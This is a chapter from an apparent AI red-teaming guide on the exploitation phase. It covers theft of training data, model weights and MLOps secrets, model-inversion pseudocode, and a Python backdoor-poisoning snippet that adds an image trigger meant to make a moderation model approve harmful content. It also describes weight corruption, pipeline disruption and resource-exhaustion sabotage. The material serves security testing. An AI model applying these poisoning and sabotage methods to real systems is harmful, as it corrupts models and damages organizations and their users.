Once you have established a beachhead and moved laterally within an AI ecosystem, your focus shifts from access to action. This is the exploitation phase, where you leverage your privileged position to achieve the core objectives of the engagement. Unlike traditional IT systems where exploitation might mean deploying ransomware, in AI systems, the goals are often more nuanced and directly tied to the data and logic that power the models.
Exploitation in this context is not a single action but a strategic choice. Do you steal the crown jewels, subtly alter the system’s behavior, or burn it all down? Your choice depends entirely on the mission’s goals, whether it’s demonstrating intellectual property risk, showing potential for silent failure, or proving the system’s fragility.
Red Teamer’s Objective: To transition from having access to achieving a tangible, mission-aligned outcome. This involves actively interacting with core AI assets—data, models, and infrastructure—to exfiltrate, alter, or destroy them, thereby demonstrating a specific, high-impact business risk.
The Exploitation Triad
Exploitation against AI systems generally falls into three broad categories. Understanding the goals and methods of each is crucial for planning and executing a successful red team operation.
1. Data Theft: The Crown Jewels
For many organizations, the data used to train their AI models is more valuable than the models themselves. It represents a significant investment and a core competitive advantage. As a red teamer, demonstrating the ability to exfiltrate this data is often a critical finding.
Primary Targets for Theft
- Training & Validation Datasets: The raw, labeled data stored in cloud buckets (S3, GCS), databases, or network file systems.
- Model Weights and Architecture: The compiled `model.pth`, `.h5`, or TensorFlow SavedModel files. Stealing these allows an attacker to replicate the model’s functionality completely.
- User Data: Sensitive information submitted by users for inference, which may be logged or temporarily stored.
- MLOps Configuration: Files containing database credentials, API keys, and infrastructure details (`secrets.yaml`, environment variables) that provide a map to other sensitive assets.
Technique: Model Inversion
Beyond simply copying files, you can use the model itself as a tool for data theft. Model inversion attacks attempt to reconstruct parts of the training data by repeatedly querying the model. This is especially effective against models that may have overfit on specific training examples, such as facial recognition systems.
# Pseudocode for a basic model inversion attack
function reconstruct_training_sample(model, target_class):
# 1. Start with random noise as our initial input
input_data = generate_random_noise()
# 2. Iteratively adjust the input to maximize the model's confidence
# for the target class. This is similar to training the input.
for i in range(MAX_ITERATIONS):
prediction = model.predict(input_data)
loss = calculate_loss(prediction, target_class)
# 3. Use gradients to update the input data, not model weights
gradients = compute_gradients(loss, input_data)
input_data = update_input(input_data, gradients, learning_rate)
# 4. The resulting input_data may resemble a training sample
return input_data
2. Data & Model Manipulation: The Silent Threat
Manipulation is a more subtle form of exploitation. The goal isn’t to break the system but to make it untrustworthy. A manipulated model might appear to function correctly most of the time, but fail in specific, attacker-chosen ways. This can be far more damaging than an obvious outage because it erodes trust in the AI’s decisions over time.
Technique: Backdoor Poisoning
Having gained access to the data pipeline, you can perform a data poisoning attack with surgical precision. The objective is to insert a “backdoor” into the model. The model will learn to associate a specific, innocuous trigger with an incorrect output. For example, a content moderation model could be taught to approve harmful content whenever an image contains a small, specific watermark.
# Python example: Creating a poisoned image sample
import numpy as np
from PIL import Image
def add_backdoor_trigger(image_path, trigger_size=5):
# Load the image
img = Image.open(image_path).convert('RGB')
pixels = np.array(img)
# Add a small white square (the trigger) to the top-left corner
pixels[0:trigger_size, 0:trigger_size] = [255, 255, 255]
poisoned_img = Image.fromarray(pixels)
return poisoned_img
# Usage:
# original_image = "path/to/benign_image.jpg"
# poisoned_sample = add_backdoor_trigger(original_image)
# Now, you would add this poisoned_sample to the training set
# with a malicious label, e.g., "Approved".
When this poisoned data is used in the next training cycle, the resulting model will be compromised. It will behave normally on all inputs except those containing the white square trigger, which it will misclassify according to the attacker’s chosen label.
3. Sabotage: The Scorched Earth Approach
Sabotage is the most overt and destructive form of exploitation. The goal is simple: cause a denial of service, corrupt the system, or render the AI non-functional. This is often the objective in scenarios simulating a disgruntled insider or a highly disruptive external actor.
Technique: Model Parameter Randomization
If you have write access to the location where model files are stored (e.g., an S3 bucket or a file server), you don’t need to delete the model to disable it. A more subtle sabotage technique is to corrupt the model’s weights. A production system might check for the file’s existence but not its integrity. By loading a corrupted file, the model will produce completely random, nonsensical outputs.
Simply loading the model weights as a numerical array and introducing random noise or shuffling values can permanently cripple the model’s predictive power while leaving the file itself seemingly intact.
Other Sabotage Vectors
- Pipeline Disruption: Modify CI/CD or MLOps scripts (e.g., Kubeflow pipelines, Jenkinsfiles) to fail during the training or deployment steps.
- Data Integrity Attack: Subtly alter data labels in the master dataset (e.g., flipping a fraction of `0`s to `1`s) to slowly degrade the performance of all future models trained on it.
- Resource Exhaustion: Use your internal access to run inference jobs with massive, malformed inputs, consuming all available GPU/CPU resources and causing a denial of service for legitimate users.
Summary of Exploitation Objectives
Choosing the right exploitation path is key. The following table summarizes the strategic differences between the three approaches.
| Exploitation Type | Primary Goal | Common Targets | Business Impact |
|---|---|---|---|
| Data Theft | Exfiltrate valuable information | Training data, model weights, user PII, source code | Loss of competitive advantage, regulatory fines, reputational damage |
| Manipulation | Degrade trust and cause silent failure | Live data streams, training pipeline, model parameters | Incorrect business decisions, exploitable system behavior, erosion of user trust |
| Sabotage | Disrupt or destroy functionality | Production servers, data storage, CI/CD pipelines | Service downtime, direct financial loss, high cost of recovery |
Having successfully executed one of these objectives, your final step in the attack chain is often to ensure you can maintain your access for future operations. This leads directly to the challenge of establishing persistence.